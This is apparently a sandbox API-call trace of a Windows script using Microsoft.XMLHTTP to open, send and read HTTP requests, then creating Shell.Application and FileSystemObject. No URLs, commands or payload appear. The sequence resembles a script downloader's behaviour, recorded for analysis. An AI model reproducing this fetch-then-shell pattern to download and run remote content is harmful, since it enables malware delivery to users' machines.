	[0394.285] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0394.285] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0394.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0394.285] ??2@YAPEAX_K@Z () returned 0x62f330
	[0394.285] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f330) 
	[0394.285] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0394.285] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0394.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0394.285] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0394.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0394.285] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0394.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0394.286] longjmp () 
	[0394.286] longjmp () 
	[0394.286] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0394.286] SysStringLen (param_1=0x0) returned 0x0
	[0394.286] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0394.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0394.286] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0394.286] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0394.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0394.286] ??2@YAPEAX_K@Z () returned 0x62f310
	[0394.286] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0394.286] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0394.286] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0394.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0394.286] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0394.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0394.286] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0394.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0394.287] longjmp () 
	[0394.287] longjmp () 
	[0394.287] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0394.287] SysStringLen (param_1=0x0) returned 0x0
	[0394.287] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0394.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0394.287] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0394.287] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0394.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7568) returned 0x0
	[0394.287] ??2@YAPEAX_K@Z () returned 0x62f330
	[0394.287] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7568, pUnkSite=0x62f330) 
	[0394.287] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0394.287] XMLHTTPRequest:IUnknown:Release (This=0x49c7568) returned 0x0
	[0394.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0394.287] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0394.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0394.287] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0394.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0394.288] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0394.288] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0394.288] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0394.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0394.997] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0394.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0394.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0394.997] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0394.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0394.997] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0394.997] SysStringLen (param_1=0x0) returned 0x0
	[0394.997] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0394.997] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0394.998] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0394.998] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0394.998] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0394.998] ??2@YAPEAX_K@Z () returned 0x62f350
	[0394.998] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0394.998] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0394.998] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0394.998] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0394.998] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0394.998] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0394.998] SysStringLen (param_1=0x0) returned 0x0
	[0394.998] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0395.002] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0395.002] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0395.002] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0395.002] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0395.002] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0395.002] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0399.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0399.999] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0399.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0400.000] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0400.000] SysStringLen (param_1=0x0) returned 0x0
	[0400.000] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0400.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0400.000] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0400.000] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0400.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72a8) returned 0x0
	[0400.000] ??2@YAPEAX_K@Z () returned 0x62f330
	[0400.000] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72a8, pUnkSite=0x62f330) 
	[0400.000] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0400.001] XMLHTTPRequest:IUnknown:Release (This=0x49c72a8) returned 0x0
	[0400.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0400.001] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0400.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0400.001] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0400.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0400.003] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0400.003] SysStringLen (param_1=0x0) returned 0x0
	[0400.003] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
